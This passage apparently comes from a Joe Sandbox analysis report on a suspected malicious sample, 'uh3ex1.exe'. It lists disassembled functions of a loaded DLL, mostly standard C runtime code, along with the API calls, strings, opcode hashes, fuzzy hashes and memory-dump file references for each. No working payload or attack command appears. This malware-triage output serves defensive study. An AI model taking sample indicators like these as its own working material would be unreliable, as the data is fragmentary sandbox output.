                                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                                • Opcode ID: 98dd266f7a91e848e49c62881e41cf0748be901f2076f458c8fa246cad394f19
                                                                                                                                                                                                                                                • Instruction ID: 173dda69b88a9786b179dc82e7b7133ee0b44add9ab5640c12b0cc3ba9509e16
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98dd266f7a91e848e49c62881e41cf0748be901f2076f458c8fa246cad394f19
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0031D474D012289BCF25DF64D888B9DBBB8BF58310F5041EAE51CAB290EB349F818F44
                                                                                                                                                                                                                                                Function 6D597C58 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D597C6E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                                                                                • Opcode ID: 304571243875d69810e0cd2dba17d410a5a79905f39f217f3f86ba6a4195204a
                                                                                                                                                                                                                                                • Instruction ID: 0aeb137a21a45782673a13018022f714b72e668330ca76f9a842d7835d3367d1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 304571243875d69810e0cd2dba17d410a5a79905f39f217f3f86ba6a4195204a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 075178B1E012868BEF19CF66C5817BABBF0FB49314F20896BD415EB644D375A900CF51
                                                                                                                                                                                                                                                Function 6D59C108 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8f8e7e8253b7687ca3de7ebb412c888012e942147c8f8d0c5453bb2dad1e5dd2
                                                                                                                                                                                                                                                • Instruction ID: 79c686a4ee23b651aa7c548876462256265ddc36fa921e432b2af2a86b9494a0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f8e7e8253b7687ca3de7ebb412c888012e942147c8f8d0c5453bb2dad1e5dd2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3241A1B5805259AFDF14DFA9CC88ABABBB8AB85304F1542D9E45DD7600DB309E848F60
                                                                                                                                                                                                                                                Function 6D59D82B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                • Opcode ID: 0671bf52a8d17b64c167fcb69804d2fbc817d0ff4ae30c03398f8b0255d4457d
                                                                                                                                                                                                                                                • Instruction ID: 767cb31bc3aba77b801915ee66f4173c7ca579d843fb290cfc155d10e78ca1f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0671bf52a8d17b64c167fcb69804d2fbc817d0ff4ae30c03398f8b0255d4457d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87A00174601252CB9F488FB7861932D3BF9BAAB69170A8169E449C5651EB2884519F02
                                                                                                                                                                                                                                                Function 6D5994EA Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6D599609
                                                                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6D599717
                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6D599869
                                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6D599884
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                • Opcode ID: 09adcd3bcc4c7ab9c91532987537aa2a125031b1bfb985b9a679c9c5286fcbcc
                                                                                                                                                                                                                                                • Instruction ID: 22451145dead8dfce0636db7904b76a751475aad33f5735864d610d0aeb3e419
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09adcd3bcc4c7ab9c91532987537aa2a125031b1bfb985b9a679c9c5286fcbcc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EB1997580428AEFCF0DCFA0C8809AEBBB5FF44314B055959E9106FA11D731DA11CFA2
                                                                                                                                                                                                                                                Function 6D598590 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6D5985C7
                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6D5985CF
                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6D598658
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6D598683
                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6D5986D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                • String ID: U|Ym$csm
                                                                                                                                                                                                                                                • API String ID: 1170836740-2912671930
                                                                                                                                                                                                                                                • Opcode ID: cd04c55f41b86a377c3ad069eee5a8fd02f36c185f6e04b2fd459974808d5109
                                                                                                                                                                                                                                                • Instruction ID: ab10250a34fe3b716cab5e7d2c781126c28f946d2d5c673de1c26dad8659cc13
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd04c55f41b86a377c3ad069eee5a8fd02f36c185f6e04b2fd459974808d5109
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9241F534A04299EFCF04CF69C880AAEBFB4BF45328F158495E9299FB51D731D905CB92
                                                                                                                                                                                                                                                Function 6D59D45A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,6D59D569,00000000,6D59AD70,00000000,00000000,00000001,?,6D59D6E2,00000022,FlsSetValue,6D5A5688,6D5A5690,00000000), ref: 6D59D51B
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                • Opcode ID: 34d0f22b8d77eb1afe38c401629820a972fe3cb4f832d9ce3e82cb4247babf63
                                                                                                                                                                                                                                                • Instruction ID: f731fa1462637d7b4759c8c263f120156928206740a56aa6889dc374006af2e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34d0f22b8d77eb1afe38c401629820a972fe3cb4f832d9ce3e82cb4247babf63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A921AB319051A1ABDF159BA5CC40F6E37B8AB877A4F254912E919AF980DB70FD00C7D1
                                                                                                                                                                                                                                                Function 6D59A69E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6B7C042E,00000000,?,00000000,6D5A2FB2,000000FF,?,6D59A638,?,?,6D59A60C,?), ref: 6D59A6D3
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D59A6E5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6D5A2FB2,000000FF,?,6D59A638,?,?,6D59A60C,?), ref: 6D59A707
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$U|Ym$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-4259744000
                                                                                                                                                                                                                                                • Opcode ID: 801f70ba91a0e3d297a26ec2695a99baec5e6dc036e4de3cd2b9b477202de3c3
                                                                                                                                                                                                                                                • Instruction ID: b0659ce2724bf2af6528f68a40537921fc013e8d3eb3106b0ea5d16415066298
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 801f70ba91a0e3d297a26ec2695a99baec5e6dc036e4de3cd2b9b477202de3c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6201623190467AEFDF059F90CC05FBEBBB9FB09715F054525F825A6A80DF749900CA91
                                                                                                                                                                                                                                                Function 6D598B3C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,6D598771,6D597870,6D597289,?,6D5974C1,?,00000001,?,?,00000001,?,6D5A9498,0000000C,6D5975BA), ref: 6D598B4A
                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D598B58
                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D598B71
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,6D5974C1,?,00000001,?,?,00000001,?,6D5A9498,0000000C,6D5975BA,?,00000001,?), ref: 6D598BC3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                • Opcode ID: 10beaea48c2deba4f3e8f1786ce89c8b4d3fa43e4aaf4b7960c4db9a20b554e9
                                                                                                                                                                                                                                                • Instruction ID: f8cc6162f5da23788631d76d897b2857b4e16f17d46ba8f216a5d2c5fd204d89
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10beaea48c2deba4f3e8f1786ce89c8b4d3fa43e4aaf4b7960c4db9a20b554e9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C01F9B212C3965FAF0C15779C84A2B3EA9EB52278726023DE6204D9D0EF314C0059C1
                                                                                                                                                                                                                                                Function 6D599293 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                                • String ID: U|Ym
                                                                                                                                                                                                                                                • API String ID: 1740715915-3624290880
                                                                                                                                                                                                                                                • Opcode ID: de23f1e48d5459131dfdd7467e01f8dcdbeb4d32c2b1ecfa58af1f1343275caa
                                                                                                                                                                                                                                                • Instruction ID: 183f8b900be4f1ca9fbd91ceb82b622890c5034834cc731b560a686dc155f347
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de23f1e48d5459131dfdd7467e01f8dcdbeb4d32c2b1ecfa58af1f1343275caa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F451AD72909682EFEB1D8F54D880BBA77B4FF84354F109929D9158FA94E731E880CB91
                                                                                                                                                                                                                                                Function 6D59C68E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Path1\To2\Save444\uh3ex1.exe, xrefs: 6D59C6AA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: C:\Path1\To2\Save444\uh3ex1.exe
                                                                                                                                                                                                                                                • API String ID: 0-817657397
                                                                                                                                                                                                                                                • Opcode ID: de9f8514eaab798a976a453156612d60e223731c9d079a77610de58d15c0aab5
                                                                                                                                                                                                                                                • Instruction ID: 358eac389138e29321fba314d7f29cc63b5d58489012b35fdb272dbeb1b514a1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de9f8514eaab798a976a453156612d60e223731c9d079a77610de58d15c0aab5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94216571208296AF9F199F69C990D7A777DFF853587118919F614DF950EF30EC0087A0
                                                                                                                                                                                                                                                Function 6D59F118 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 6D59F19D
                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 6D59F266
                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 6D59F2CD
                                                                                                                                                                                                                                                  • Part of subcall function 6D59E2BA: HeapAlloc.KERNEL32(00000000,6D59CC07,?,?,6D59CC07,00000220,?,00000000,?), ref: 6D59E2EC
                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 6D59F2E0
                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 6D59F2ED
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1096550386-0
                                                                                                                                                                                                                                                • Opcode ID: b1cc1671c7534b4c96b8de643dce3ebd3d400eeea5ebb5712d739932273f9556
                                                                                                                                                                                                                                                • Instruction ID: 112f8fe647ab11b5a42022db878792ace11685a08fdb38e3917e1a7c6393dd03
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1cc1671c7534b4c96b8de643dce3ebd3d400eeea5ebb5712d739932273f9556
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD51AF76614287ABEF198FA5CC40FBB36AEEF85714B254929FD14DE940EB30CC10C6A4
                                                                                                                                                                                                                                                Function 6D599112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D5990C3,00000000,?,00000001,?,?,?,6D5991B2,00000001,FlsFree,6D5A4D60,FlsFree), ref: 6D59911F
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,6D5990C3,00000000,?,00000001,?,?,?,6D5991B2,00000001,FlsFree,6D5A4D60,FlsFree,00000000,?,6D598C11), ref: 6D599129
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D599151
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
